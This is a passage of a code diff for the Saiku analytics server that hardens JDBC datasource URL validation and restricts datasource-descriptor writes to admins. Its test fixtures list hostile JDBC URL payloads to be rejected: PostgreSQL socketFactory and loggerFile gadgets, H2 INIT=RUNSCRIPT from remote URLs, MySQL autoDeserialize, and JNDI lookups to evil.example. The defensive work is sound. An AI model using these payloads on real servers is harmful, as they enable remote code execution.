+        JdbcUrlPolicy.validate("jdbc:mysql+srv://cluster.example.com/warehouse");
+        JdbcUrlPolicy.validate("jdbc:mariadb://db.example.com/warehouse");
+        JdbcUrlPolicy.validate("jdbc:sqlserver://db.example.com:1433;databaseName=warehouse;encrypt=true;"
+                + "trustServerCertificate=true");
+        JdbcUrlPolicy.validate("jdbc:jtds:sqlserver://db.example.com:1433/warehouse");
+        JdbcUrlPolicy.validate("jdbc:oracle:thin:@//db.example.com:1521/ORCLPDB1");
+        JdbcUrlPolicy.validate("jdbc:hive2://hive.example.com:10000/default;ssl=true?hive.execution.engine=tez");
+        JdbcUrlPolicy.validate("jdbc:snowflake://acct.snowflakecomputing.com/?db=WH&warehouse=COMPUTE_WH");
+        JdbcUrlPolicy.validate("jdbc:bigquery://https://www.googleapis.com/bigquery/v2:443;ProjectId=p;"
+                + "OAuthType=0;OAuthServiceAcctEmail=x@p.iam.gserviceaccount.com;OAuthPvtKeyPath=/etc/key.p12");
+        JdbcUrlPolicy.validate("jdbc:clickhouse://ch.example.com:8123/default?compress=1");
+        JdbcUrlPolicy.validate("jdbc:duckdb:/data/warehouse.duckdb");
+        JdbcUrlPolicy.validate("jdbc:hsqldb:file:/opt/saiku-home/data/hsql;shutdown=true");
+    }
+
+    @Test
+    public void acceptsLakehouseTrinoExample() {
+        // examples/lakehouse-demo/saiku/lakehouse.sds — Trino wants ?user= on the URL.
+        JdbcUrlPolicy.validate("jdbc:mondrian:Jdbc=jdbc:trino://localhost:8090/iceberg/sales?user=saiku;"
+                + "Catalog=file:/opt/saiku-home/data/LakehouseSales.xml;JdbcDrivers=io.trino.jdbc.TrinoDriver");
+    }
+
+    @Test
+    public void acceptsXmlaWrapper() {
+        JdbcUrlPolicy.validate("jdbc:xmla:Server=http://olap.example.com/xmla;Catalog=Sales");
+    }
+
+    @Test
+    public void acceptsMondrianJndiDataSourceNames() {
+        JdbcUrlPolicy.validate("jdbc:mondrian:DataSource=java:comp/env/jdbc/foodmart;Catalog=file:/x.xml");
+        JdbcUrlPolicy.validate("jdbc:mondrian:DataSource=jdbc/foodmart;Catalog=file:/x.xml");
+        // The legacy Pentaho OSGi form SaikuOlapConnection rewrites `DataSource=` into.
+        JdbcUrlPolicy.validate("jdbc:mondrian4:DataSource=osgi:service/jdbc/foodmart;Catalog=file:/x.xml");
+    }
+
+    @Test
+    public void acceptsLegacySaiku3MondrianPrefix() {
+        JdbcUrlPolicy.validate("Mondrian=4; jdbc:mondrian:Jdbc=jdbc:h2:mem:x;Catalog=file:/x.xml");
+    }
+
+    @Test
+    public void acceptsQuotedInnerJdbcUrl() {
+        JdbcUrlPolicy.validate("jdbc:mondrian:Jdbc='jdbc:h2:mem:x;MODE=MySQL';Catalog=file:/x.xml");
+    }
+
+    @Test
+    public void acceptsNullAndBlank() {
+        JdbcUrlPolicy.validate(null);
+        JdbcUrlPolicy.validate("");
+        JdbcUrlPolicy.validate("   ");
+    }
+
+    @Test
+    public void operatorCanExtendTheSchemeAllowList() {
+        assertRejected("jdbc:exotic://h/db", "not on the allowed list");
+        System.setProperty(JdbcUrlPolicy.ALLOWED_SCHEMES_PROPERTY, " Exotic , other ");
+        JdbcUrlPolicy.validate("jdbc:exotic://h/db");
+        JdbcUrlPolicy.validate("jdbc:other:whatever");
+    }
+
+    /* ------------------------------------------------------------------ rejects: class loading */
+
+    @Test
+    public void rejectsPostgresSocketFactoryGadget() {
+        assertRejected(PG_GADGET, "socketfactory");
+    }
+
+    @Test
+    public void rejectsPostgresSocketFactoryGadgetNestedInMondrianWrapper() {
+        assertRejected(
+                "jdbc:mondrian:Jdbc=" + PG_GADGET
+                        + ";Catalog=file:/x.xml;JdbcDrivers=org.postgresql.Driver;JdbcUser=sa;",
+                "socketfactory");
+    }
+
+    @Test
+    public void rejectsPercentEncodedDeniedKey() {
+        // pgjdbc decodes query keys itself, so an encoded spelling is honoured by the driver.
+        assertRejected("jdbc:postgresql://h/db?socket%46actory=x", "socketfactory");
+        assertRejected("jdbc:postgresql://h/db?socket%2546actory=x", "socketfactory");
+        assertRejected("jdbc:mysql://h/db?%61utoDeserialize=true", "autodeserialize");
+    }
+
+    @Test
+    public void rejectsCaseAndSeparatorObfuscatedKeys() {
+        // Connector/J looks keys up case-insensitively; a refactor must not regress to exact match.
+        assertRejected("jdbc:mysql://h/db?AUTODESERIALIZE=true", "autodeserialize");
+        assertRejected("jdbc:mysql://h/db?auto_deserialize=true", "autodeserialize");
+        assertRejected("jdbc:postgresql://h/db? socketFactory =x", "socketfactory");
+    }
+
+    @Test
+    public void rejectsPostgresSslFactoryAndLoggerFile() {
+        assertRejected("jdbc:postgresql://h/db?sslfactory=evil.Cls&sslfactoryarg=x", "sslfactory");
+        assertRejected("jdbc:postgresql://h/db?loggerLevel=DEBUG&loggerFile=/var/www/shell.jsp", "loggerfile");
+        assertRejected(
+                "jdbc:postgresql://h/db?authenticationPluginClassName=evil.Cls", "authenticationpluginclassname");
+    }
+
+    @Test
+    public void rejectsMysqlGadgetFamilies() {
+        assertRejected("jdbc:mysql://h/db?autoDeserialize=true&queryInterceptors=evil.Cls", "autodeserialize");
+        assertRejected("jdbc:mysql://h/db?queryInterceptors=evil.Cls", "queryinterceptors");
+        assertRejected("jdbc:mysql://h/db?statementInterceptors=evil.Cls", "statementinterceptors");
+        assertRejected("jdbc:mysql://h/db?allowLoadLocalInfile=true", "allowloadlocalinfile");
+        assertRejected("jdbc:mysql://h/db?allowUrlInLocalInfile=true", "allowurlinlocalinfile");
+        assertRejected("jdbc:mysql://h/db?propertiesTransform=evil.Cls", "propertiestransform");
+        assertRejected("jdbc:mysql://h/db?ha.loadBalanceStrategy=evil.Cls", "loadbalancestrategy");
+        assertRejected("jdbc:mysql:loadbalance://h1,h2/db?loadBalanceStrategy=evil.Cls", "loadbalancestrategy");
+        assertRejected("jdbc:mariadb://h/db?allowLocalInfile=true", "allowlocalinfile");
+    }
+
+    @Test
+    public void duckDb_onlyUnsignedOrForeignExtensionLoadingIsRefused() {
+        // saiku-cloud's file-upload path uses synthetic jdbc:duckdb:r2:// URLs that rely on the
+        // official, signed extension set autoloading (httpfs) — those knobs must stay usable.
+        JdbcUrlPolicy.validate("jdbc:duckdb:r2://tenant/uploads/sales.parquet"
+                + "?autoload_known_extensions=true&autoinstall_known_extensions=true&extension_directory=/tmp/ext");
+        assertRejected("jdbc:duckdb:/data/wh.duckdb?allow_unsigned_extensions=true", "allowunsignedextensions");
+        assertRejected(
+                "jdbc:quack:/data/wh.duckdb?custom_extension_repository=http://evil/x", "customextensionrepository");
+    }
+
+    @Test
+    public void rejectsMssqlGadgetFamilies() {
+        assertRejected("jdbc:sqlserver://h;socketFactoryClass=evil.Cls;socketFactoryConstructorArg=x", "socketfactory");
+        assertRejected("jdbc:sqlserver://h;accessTokenCallbackClass=evil.Cls", "accesstokencallbackclass");
+    }
+
+    /* ------------------------------------------------------------------ rejects: H2 */
+
+    @Test
+    public void rejectsH2ExecutableTokens() {
+        assertRejected("jdbc:h2:mem:x;INIT=RUNSCRIPT FROM 'http://e/p.sql'", "INIT=");
+        assertRejected("jdbc:h2:mem:x;init = runscript from 'http://e/p.sql'", "INIT=");
+        assertRejected("jdbc:h2:mem:x;runscript from 'http://e/p.sql'", "RUNSCRIPT");
+        assertRejected("jdbc:h2:mem:x;INIT=CREATE ALIAS EXEC AS $$ String x() { return \"y\"; } $$", "INIT=");
+        assertRejected("jdbc:h2:mem:x;CREATE FORCE VIEW v AS SELECT 1", "CREATE ALIAS/TRIGGER/FORCE");
+        assertRejected("jdbc:h2:mem:x;SHUTDOWN", "SHUTDOWN");
+        assertRejected("jdbc:h2:mem:x;JAVA_OBJECT_SERIALIZER=evil.Cls", "javaobjectserializer");
+        assertRejected(
+                "jdbc:mondrian:Jdbc=jdbc:h2:./foodmart;INIT=RUNSCRIPT FROM 'http://e/p.sql';Catalog=mondrian://Foodmart;"
+                        + "JdbcDrivers=org.h2.Driver",
+                "INIT=");
+    }
+
+    /* ------------------------------------------------------------------ rejects: Calcite / JNDI */
+
+    @Test
+    public void rejectsCalciteModelUrls() {
+        assertRejected(
+                "jdbc:calcite:model=inline:{\"schemas\":[{\"type\":\"jdbc\",\"jdbcUrl\":\"" + PG_GADGET + "\"}]}",
+                "calcite");
+        assertRejected("jdbc:calcite:model=/tmp/model.json", "calcite");
+        assertRejected("jdbc:mondrian:Jdbc=jdbc:calcite:model=inline:{};Catalog=file:/x.xml", "calcite");
+    }
+
+    @Test
+    public void rejectsCalciteModelEvenWhenOperatorAllowsTheScheme() {
+        System.setProperty(JdbcUrlPolicy.ALLOWED_SCHEMES_PROPERTY, "calcite");
+        assertRejected("jdbc:calcite:model=inline:{}", "Calcite model");
+        assertRejected("jdbc:calcite:schemaFactory=evil.Cls", "Calcite model");
+    }
+
+    @Test
+    public void rejectsMondrianJndiUrlDataSource() {
+        assertRejected("jdbc:mondrian:DataSource=ldap://evil.example:1389/x;Catalog=file:/x.xml", "JNDI");
+        assertRejected("jdbc:mondrian:DataSource=rmi://evil.example:1099/x;Catalog=file:/x.xml", "JNDI");
+        assertRejected("jdbc:mondrian:DataSource='ldap://evil.example/x';Catalog=file:/x.xml", "JNDI");
+    }
+
+    @Test
+    public void rejectsJndiEnvironmentProperties() {
+        assertRejected("jdbc:postgresql://h/db?java.naming.factory.initial=evil.Cls", "javanaming");
+        assertRejected("jdbc:postgresql://h/db?java.naming.provider.url=ldap://evil/x", "javanaming");
+    }
+
+    /* ------------------------------------------------------------------ rejects: structure */
+
+    @Test
+    public void rejectsUnknownSchemeAndNonJdbcUrls() {
+        assertRejected("jdbc:evil://h/db", "not on the allowed list");
+        assertRejected("http://evil.example/x", "must start with jdbc:");
+        assertRejected("jdbc:", "malformed");
+        assertRejected("jdbc: h2:mem:x", "malformed");
+    }
+
+    @Test
+    public void rejectsControlCharacters() {
+        assertRejected("jdbc:postgresql://h/db?x=1\n&socketFactory=y", "control characters");
+        assertRejected("jdbc:postgresql://h/db%0A?socketFactory=y", "control characters");
+    }
+
+    @Test
+    public void rejectsDuplicateJdbcKeyReinjectedThroughCredentials() {
+        // What SaikuOlapConnection would build if a descriptor's username were
+        // "sa;Jdbc=jdbc:postgresql://evil/db?socketFactory=X" — Mondrian's property list lets the
+        // later key win, so EVERY Jdbc= occurrence must be validated.
+        assertRejected(
+                "jdbc:mondrian:Jdbc=jdbc:h2:mem:x;Catalog=file:/x.xml;JdbcDrivers=org.h2.Driver;" + "JdbcUser=sa;Jdbc="
+                        + PG_GADGET + ";JdbcPassword=p;",
+                "socketfactory");
+    }
+
+    @Test
+    public void rejectionNeverEchoesTheUrl() {
+        try {
+            JdbcUrlPolicy.validate(PG_GADGET + "&password=hunter2");
+            fail("expected rejection");
+        } catch (IllegalArgumentException e) {
+            assertFalse("host must not leak: " + e.getMessage(), e.getMessage().contains("evil.example"));
+            assertFalse(
+                    "credential must not leak: " + e.getMessage(),
+                    e.getMessage().contains("hunter2"));
+        }
+    }
+
+    /* ------------------------------------------------------------------ helpers */
+
+    @Test
+    public void percentDecodeLeavesPlusAndMalformedEscapesAlone() {
+        org.junit.Assert.assertEquals("jdbc:mysql+srv://h/db", JdbcUrlPolicy.percentDecode("jdbc:mysql+srv://h/db"));
+        org.junit.Assert.assertEquals("a=b%zz", JdbcUrlPolicy.percentDecode("a=b%zz"));
+        org.junit.Assert.assertEquals("socketFactory", JdbcUrlPolicy.percentDecode("socket%2546actory"));
+    }
+
+    private static void assertRejected(String url, String expectedReasonFragment) {
+        try {
+            JdbcUrlPolicy.validate(url);
+            fail("expected rejection of: " + url);
+        } catch (IllegalArgumentException e) {
+            String msg = e.getMessage();
+            assertTrue(
+                    "rejection should name an invalid JDBC URL, was: " + msg,
+                    msg.contains("Invalid datasource JDBC URL"));
+            assertTrue(
+                    "rejection reason should mention '" + expectedReasonFragment + "', was: " + msg,
+                    msg.toLowerCase().contains(expectedReasonFragment.toLowerCase()));
+        }
+    }
+}

--- a/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/objects/JdbcUrlValidator.java
+++ b/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/objects/JdbcUrlValidator.java
@@ -15,151 +15,32 @@
  */
 package org.saiku.web.rest.objects;
 
-import java.util.Locale;
-import java.util.regex.Pattern;
-import org.slf4j.Logger;
-import org.slf4j.LoggerFactory;
+import org.saiku.service.datasource.JdbcUrlPolicy;
 
 /**
- * Centralised validation for admin-supplied datasource JDBC URLs / connection locations.
+ * Early, friendly rejection of admin-supplied datasource JDBC URLs at the REST edge.
  *
- * <p>An admin can configure a datasource whose JDBC URL eventually reaches
- * {@code DriverManager.getConnection(...)}. The H2 driver in particular treats certain URL
- * parameters as executable instructions: {@code ;INIT=RUNSCRIPT FROM '...'},
- * {@code CREATE ALIAS}/{@code CREATE TRIGGER} (Java stored procedures), and {@code ;SHUTDOWN}.
- * These turn an otherwise data-only connection string into arbitrary code / lifecycle control on
- * the server — an admin-gated but confirmed RCE vector.
+ * <p>saiku#1902: this used to be the <em>only</em> check, it was H2-only, and it lived here in
+ * {@code saiku-web} — so the {@code .sds} file-load path in {@code saiku-service} (boot,
+ * {@code /discover/refresh}) ran no validation at all and any non-H2 driver gadget went straight to
+ * {@code DriverManager}. The policy now lives in {@link JdbcUrlPolicy} (service layer) and is
+ * enforced at the connection chokepoint regardless of how the URL arrived; this class is kept as
+ * the web-layer façade so the admin form fails fast with the same rules.
  *
- * <p>This validator HARD-rejects the dangerous H2 tokens (including when the H2 URL is nested
- * inside a {@code jdbc:mondrian:Jdbc=...} wrapper) and applies a permissive, warn-only scheme
- * allow-list so legitimate backends are never broken.
+ * @see JdbcUrlPolicy
  */
 public final class JdbcUrlValidator {
 
-    private static final Logger LOG = LoggerFactory.getLogger(JdbcUrlValidator.class);
-
     private JdbcUrlValidator() {}
-
-    /** Dangerous H2 tokens. Matched case-insensitively against the (sub-)URL. */
-    private static final Pattern H2_INIT = Pattern.compile("(?i)\\bINIT\\s*=");
-
-    private static final Pattern H2_RUNSCRIPT = Pattern.compile("(?i)\\bRUNSCRIPT\\b");
-
-    private static final Pattern H2_CREATE_EXEC = Pattern.compile("(?i)\\bCREATE\\s+(ALIAS|TRIGGER|FORCE)\\b");
-
-    private static final Pattern H2_SHUTDOWN = Pattern.compile("(?i);\\s*SHUTDOWN\\b");
-
-    /**
-     * Permissive (warn-only) allow-list of recognised JDBC sub-schemes / driver schemes. Unknown
-     * schemes are logged but accepted, so custom backends keep working; only the dangerous H2
-     * tokens are a hard failure.
-     */
-    private static final String[] KNOWN_SCHEMES = {
-        "jdbc:h2:",
-        "jdbc:postgresql:",
-        "jdbc:mysql:",
-        "jdbc:mariadb:",
-        "jdbc:sqlserver:",
-        "jdbc:jtds:",
-        "jdbc:oracle:",
-        "jdbc:hsqldb:",
-        "jdbc:mondrian:",
-        "jdbc:xmla:"
-    };
 
     /**
      * Validate an admin-supplied JDBC URL or raw {@code location=} value.
      *
      * @param jdbcUrlOrLocation the JDBC URL or connection location (may be a Mondrian/XMLA wrapper)
-     * @throws IllegalArgumentException if the URL contains a dangerous H2 instruction token
+     * @throws IllegalArgumentException if the URL violates {@link JdbcUrlPolicy}; the message never
+     *     echoes the URL
      */
     public static void validate(String jdbcUrlOrLocation) {
-        if (jdbcUrlOrLocation == null) {
-            return;
-        }
-        String url = jdbcUrlOrLocation.trim();
-        if (url.isEmpty()) {
-            return;
-        }
-
-        // Reject on the whole string first (covers any layer / nesting), then specifically the
-        // inner jdbc sub-URL nested in a mondrian wrapper (jdbc:mondrian:Jdbc=jdbc:h2:...).
-        rejectDangerousH2Tokens(url);
-        String inner = extractMondrianInnerJdbc(url);
-        if (inner != null) {
-            rejectDangerousH2Tokens(inner);
-        }
-
-        warnOnUnknownScheme(url, inner);
-    }
-
-    private static void rejectDangerousH2Tokens(String url) {
-        String lower = url.toLowerCase(Locale.ROOT);
-        // Only the H2 tokens are weaponised through the H2 driver; gate on an H2 sub-URL being
-        // present anywhere in the (possibly wrapped) string.
-        boolean looksH2 = lower.contains("jdbc:h2:");
-        if (!looksH2) {
-            return;
-        }
-        if (H2_INIT.matcher(url).find()) {
-            throw reject(url, "H2 INIT= run-on-connect is not permitted");
-        }
-        if (H2_RUNSCRIPT.matcher(url).find()) {
-            throw reject(url, "H2 RUNSCRIPT is not permitted");
-        }
-        if (H2_CREATE_EXEC.matcher(url).find()) {
-            throw reject(url, "H2 CREATE ALIAS/TRIGGER/FORCE is not permitted");
-        }
-        if (H2_SHUTDOWN.matcher(url).find()) {
-            throw reject(url, "H2 SHUTDOWN is not permitted");
-        }
-    }
-
-    private static IllegalArgumentException reject(String url, String reason) {
-        // Do not echo the full (potentially sensitive) URL into the exception message.
-        LOG.warn("Rejected datasource JDBC URL: {}", reason);
-        return new IllegalArgumentException("Invalid datasource JDBC URL: " + reason);
-    }
-
-    /**
-     * Pull the nested JDBC sub-URL out of a {@code jdbc:mondrian:Jdbc=<sub-url>;Catalog=...} string.
-     * Returns {@code null} when the input is not a mondrian wrapper.
-     */
-    private static String extractMondrianInnerJdbc(String url) {
-        String lower = url.toLowerCase(Locale.ROOT);
-        int idx = lower.indexOf("jdbc=");
-        if (idx < 0) {
-            return null;
-        }
-        int start = idx + "jdbc=".length();
-        // The inner JDBC URL itself can contain ';' (e.g. H2 settings), so we cannot simply cut at
-        // the first ';'. Cut at the next mondrian wrapper key instead, falling back to end-of-string.
-        int end = url.length();
-        int catalog = lower.indexOf(";catalog=", start);
-        int drivers = lower.indexOf(";jdbcdrivers=", start);
-        if (catalog >= 0) {
-            end = Math.min(end, catalog);
-        }
-        if (drivers >= 0) {
-            end = Math.min(end, drivers);
-        }
-        return url.substring(start, end);
-    }
-
-    private static void warnOnUnknownScheme(String url, String inner) {
-        if (matchesKnownScheme(url) || (inner != null && matchesKnownScheme(inner))) {
-            return;
-        }
-        LOG.warn("Datasource JDBC URL uses an unrecognised scheme; allowing (warn-only allow-list).");
-    }
-
-    private static boolean matchesKnownScheme(String url) {
-        String lower = url.toLowerCase(Locale.ROOT).trim();
-        for (String scheme : KNOWN_SCHEMES) {
-            if (lower.startsWith(scheme)) {
-                return true;
-            }
-        }
-        return false;
+        JdbcUrlPolicy.validate(jdbcUrlOrLocation);
     }
 }

--- a/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/resources/BasicRepositoryResource2.java
+++ b/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/resources/BasicRepositoryResource2.java
@@ -46,6 +46,7 @@ import org.saiku.repository.AclEntry;
 import org.saiku.repository.IRepositoryObject;
 import org.saiku.service.ISessionService;
 import org.saiku.service.datasource.DatasourceService;
+import org.saiku.service.user.UserService;
 import org.saiku.service.util.exception.SaikuServiceException;
 import org.saiku.web.rest.util.SessionRoles;
 import org.slf4j.Logger;
@@ -65,10 +66,65 @@ public class BasicRepositoryResource2 implements ISaikuRepository {
 
     // private Acl acl;
     private DatasourceService datasourceService;
+    private UserService userService;
     private File repo;
 
     public void setDatasourceService(DatasourceService ds) {
         datasourceService = ds;
+    }
+
+    /**
+     * saiku#1903: used for the admin check on datasource-descriptor writes. Optional — when not
+     * wired the check falls back to a {@code ROLE_ADMIN} lookup on the authoritative
+     * {@link SessionRoles}.
+     */
+    public void setUserService(UserService userService) {
+        this.userService = userService;
+    }
+
+    /**
+     * saiku#1903: is {@code path} a datasource descriptor ({@code *.sds}) or anything under the
+     * {@code /datasources} tree? The datasource loader lists {@code *.sds} recursively across the
+     * whole repository, so a descriptor saved into a user's own home is loaded — and its JDBC URL
+     * connected — exactly like one an admin placed in {@code /datasources}. Non-admins therefore
+     * may not write one anywhere. Mirrors {@code FilesystemRepositoryManager}'s own guard, which
+     * is the hard stop; this one turns the refusal into a clean 403 instead of a 500.
+     */
+    static boolean isDatasourceDescriptorPath(String path) {
+        if (path == null) {
+            return false;
+        }
+        String p = path.replace('\\', '/').trim().toLowerCase(java.util.Locale.ROOT);
+        while (p.startsWith("./")) {
+            p = p.substring(2);
+        }
+        if (p.endsWith(".sds")) {
+            return true;
+        }
+        String noLead = p.startsWith("/") ? p.substring(1) : p;
+        return noLead.equals("datasources") || noLead.startsWith("datasources/") || p.contains("/datasources/");
+    }
+
+    private boolean callerIsAdmin() {
+        if (userService != null) {
+            return userService.isAdmin();
+        }
+        return SessionRoles.currentRoles().contains("ROLE_ADMIN");
+    }
+
+    /** {@code null} when the write may proceed, otherwise the 403 to return. */
+    private Response refuseDatasourceDescriptorWrite(String... paths) {
+        for (String p : paths) {
+            if (isDatasourceDescriptorPath(p) && !callerIsAdmin()) {
+                log.warn("Refused non-admin write of a datasource descriptor (saiku#1903): {}", p);
+                return Response.status(Status.FORBIDDEN)
+                        .entity("Datasource descriptors (.sds) and the /datasources tree can only be modified by an"
+                                + " administrator")
+                        .type("text/plain")
+                        .build();
+            }
+        }
+        return null;
     }
 
     public void setPath(String path) throws Exception {
@@ -221,6 +277,11 @@ public class BasicRepositoryResource2 implements ISaikuRepository {
     @POST
     @Path("/resource")
     public Response saveResource(@FormParam("file") String file, @FormParam("content") String content) {
+        // saiku#1903: datasource descriptors are admin-only, wherever they would land.
+        Response refused = refuseDatasourceDescriptorWrite(file);
+        if (refused != null) {
+            return refused;
+        }
         String username = sessionService.getAllSessionObjects().get("username").toString();
         // saiku#1752: authoritative SecurityContextHolder read, not the session "roles" map.
         List<String> roles = SessionRoles.currentRoles();
@@ -272,6 +333,12 @@ public class BasicRepositoryResource2 implements ISaikuRepository {
     @POST
     @Path("/resource/move")
     public Response moveResource(@FormParam("source") String source, @FormParam("target") String target) {
+        // saiku#1903: a rename into *.sds / into /datasources is a descriptor write; moving an
+        // existing descriptor is equally admin-only.
+        Response refused = refuseDatasourceDescriptorWrite(source, target);
+        if (refused != null) {
+            return refused;
+        }
         String username = sessionService.getAllSessionObjects().get("username").toString();
         // saiku#1752: authoritative SecurityContextHolder read, not the session "roles" map.
         List<String> roles = SessionRoles.currentRoles();

--- a/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/resources/BasicRepositoryResource2.java
+++ b/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/resources/BasicRepositoryResource2.java
@@ -89,6 +89,10 @@ public class BasicRepositoryResource2 implements ISaikuRepository {
      * connected — exactly like one an admin placed in {@code /datasources}. Non-admins therefore
      * may not write one anywhere. Mirrors {@code FilesystemRepositoryManager}'s own guard, which
      * is the hard stop; this one turns the refusal into a clean 403 instead of a 500.
+     *
+     * <p>saiku#1903 (SEC follow-up): the check is against the on-disk name Win32 would create —
+     * trailing dots/spaces stripped and any NTFS alternate-data-stream suffix removed — so
+     * {@code evil.sds.}, {@code "evil.sds "} and {@code evil.sds::$DATA} don't slip past.
      */
     static boolean isDatasourceDescriptorPath(String path) {
         if (path == null) {
@@ -98,11 +102,31 @@ public class BasicRepositoryResource2 implements ISaikuRepository {
         while (p.startsWith("./")) {
             p = p.substring(2);
         }
+        p = stripWindowsFilenameTail(p);
         if (p.endsWith(".sds")) {
             return true;
         }
         String noLead = p.startsWith("/") ? p.substring(1) : p;
         return noLead.equals("datasources") || noLead.startsWith("datasources/") || p.contains("/datasources/");
+    }
+
+    /**
+     * Drop an NTFS alternate-data-stream suffix on the final segment (everything from the first
+     * {@code :} after the last {@code /} — repository paths are relative, no drive-letter colon),
+     * then strip trailing dots and spaces. Kept in sync with
+     * {@code FilesystemRepositoryManager.stripWindowsFilenameTail}.
+     */
+    static String stripWindowsFilenameTail(String p) {
+        int lastSlash = p.lastIndexOf('/');
+        int colon = p.indexOf(':', lastSlash + 1);
+        if (colon >= 0) {
+            p = p.substring(0, colon);
+        }
+        int end = p.length();
+        while (end > 0 && (p.charAt(end - 1) == '.' || p.charAt(end - 1) == ' ')) {
+            end--;
+        }
+        return p.substring(0, end);
     }
 
     private boolean callerIsAdmin() {

--- a/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/resources/OlapDiscoverResource.java
+++ b/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/resources/OlapDiscoverResource.java
@@ -134,6 +134,13 @@ public class OlapDiscoverResource implements Serializable {
 
     /**
      * Refresh the Saiku connections.
+     *
+     * <p>Deliberately NOT admin-gated (saiku#1903): the workbench's cube picker polls this endpoint
+     * for every user to pick up late-arriving cubes, so a role gate here would break ordinary use.
+     * It is safe to leave open because a refresh can only re-load descriptors an administrator was
+     * able to write (non-admin {@code .sds} writes are refused, {@code /datasources} is SECURED) and
+     * every descriptor is validated by {@code JdbcUrlPolicy} before any driver is touched.
+     *
      * @Summary Refresh connections.
      * @return The existing connections.
      */

--- a/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/resources/cubedesigner/CubeDesignerResource.java
+++ b/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/resources/cubedesigner/CubeDesignerResource.java
@@ -411,11 +411,14 @@ public class CubeDesignerResource {
         if (password != null && !password.isEmpty()) {
             url += "JdbcPassword=" + password + ";";
         }
+        // saiku#1902: same policy as the SaikuOlapConnection chokepoint — validate the FINAL url
+        // (credentials appended) and only initialise a real java.sql.Driver class.
+        org.saiku.service.datasource.JdbcUrlPolicy.validate(url);
         if (driver != null && !driver.isEmpty()) {
-            Class.forName(driver);
+            org.saiku.service.datasource.JdbcUrlPolicy.loadDriverClass(driver);
         }
 
-        try (java.sql.Connection raw = java.sql.DriverManager.getConnection(url, user, password)) {
+        try (java.sql.Connection raw = org.saiku.service.datasource.JdbcUrlPolicy.openConnection(url, user, password)) {
             org.olap4j.OlapConnection olap = raw.unwrap(org.olap4j.OlapConnection.class);
             try (org.olap4j.OlapStatement st = olap.createStatement()) {
                 st.setQueryTimeout(PREVIEW_TIMEOUT_SECONDS);

--- a/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/resources/schemagen/DatasourceJdbcConnectionProvider.java
+++ b/saiku-core/saiku-web/src/main/java/org/saiku/web/rest/resources/schemagen/DatasourceJdbcConnectionProvider.java
@@ -14,6 +14,7 @@ import java.util.Properties;
 import org.saiku.datasources.connection.ISaikuConnection;
 import org.saiku.datasources.datasource.SaikuDatasource;
 import org.saiku.service.datasource.DatasourceService;
+import org.saiku.service.datasource.JdbcUrlPolicy;
 import org.saiku.service.schema.generate.session.SchemaGenOrchestrator;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
@@ -81,6 +82,14 @@ public class DatasourceJdbcConnectionProvider implements SchemaGenOrchestrator.C
             throw new SQLException("Saiku datasource '" + dataSourceId + "' location is not a JDBC URL: " + location);
         }
 
+        // saiku#1902: same policy as the SaikuOlapConnection chokepoint. Reject a forbidden URL
+        // before any driver class is touched; surface it as the SQLException this contract speaks.
+        try {
+            JdbcUrlPolicy.validate(jdbcUrl);
+        } catch (IllegalArgumentException policy) {
+            throw new SQLException(policy.getMessage(), policy);
+        }
+
         if (driver != null && !driver.isEmpty()) {
             // JdbcDrivers can be a comma-separated list — try each until one loads.
             for (String candidate : driver.split(",")) {
@@ -89,9 +98,12 @@ public class DatasourceJdbcConnectionProvider implements SchemaGenOrchestrator.C
                     continue;
                 }
                 try {
-                    Class.forName(c);
+                    // Type-checked before initialisation (no static-init gadget via JdbcDrivers=).
+                    JdbcUrlPolicy.loadDriverClass(c);
                 } catch (ClassNotFoundException ex) {
                     LOG.debug("JDBC driver '{}' not found on classpath for '{}': {}", c, dataSourceId, ex.getMessage());
+                } catch (IllegalArgumentException notADriver) {
+                    throw new SQLException(notADriver.getMessage(), notADriver);
                 }
             }
         }
@@ -106,7 +118,7 @@ public class DatasourceJdbcConnectionProvider implements SchemaGenOrchestrator.C
         if (password != null) {
             jdbcProps.setProperty("password", password);
         }
-        return DriverManager.getConnection(jdbcUrl, jdbcProps);
+        return JdbcUrlPolicy.openConnection(jdbcUrl, jdbcProps);
     }
 
     /**

--- a/saiku-core/saiku-web/src/test/java/org/saiku/web/rest/objects/JdbcUrlValidatorTest.java
+++ b/saiku-core/saiku-web/src/test/java/org/saiku/web/rest/objects/JdbcUrlValidatorTest.java
@@ -131,6 +131,51 @@ public class JdbcUrlValidatorTest {
         assertRejected("jdbc:h2:mem:x;shutdown");
     }
 
+    /* ---- saiku#1902: the façade now delegates to JdbcUrlPolicy, so the non-H2 gadget ---- */
+    /* ---- families are refused at the REST edge too (the service chokepoint is authoritative). */
+
+    @Test
+    public void rejectsPostgresSocketFactoryGadget() {
+        assertRejected(
+                "jdbc:postgresql://h/db?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext"
+                        + "&socketFactoryArg=http://e/ctx.xml");
+    }
+
+    @Test
+    public void rejectsPostgresSocketFactoryGadgetInsideMondrianWrapper() {
+        assertRejected("jdbc:mondrian:Jdbc=jdbc:postgresql://h/db?socketFactory=x.Y&socketFactoryArg=z;"
+                + "Catalog=mondrian://Foodmart;JdbcDrivers=org.postgresql.Driver");
+    }
+
+    @Test
+    public void rejectsMysqlAutoDeserialize() {
+        assertRejected("jdbc:mysql://h/db?autoDeserialize=true&queryInterceptors=x.Y");
+    }
+
+    @Test
+    public void rejectsPercentEncodedDeniedKey() {
+        assertRejected("jdbc:postgresql://h/db?socket%46actory=x");
+    }
+
+    @Test
+    public void rejectsUnknownScheme() {
+        assertRejected("jdbc:evil://h/db");
+    }
+
+    @Test
+    public void rejectsCalciteInlineModel() {
+        assertRejected("jdbc:calcite:model=inline:{\"schemas\":[]}");
+    }
+
+    @Test
+    public void acceptsOrdinaryNonH2Backends() {
+        JdbcUrlValidator.validate("jdbc:mysql://h/db?useSSL=true");
+        JdbcUrlValidator.validate("jdbc:sqlserver://h:1433;databaseName=db;encrypt=true");
+        JdbcUrlValidator.validate("jdbc:trino://h:8090/iceberg/sales?user=saiku");
+        JdbcUrlValidator.validate(
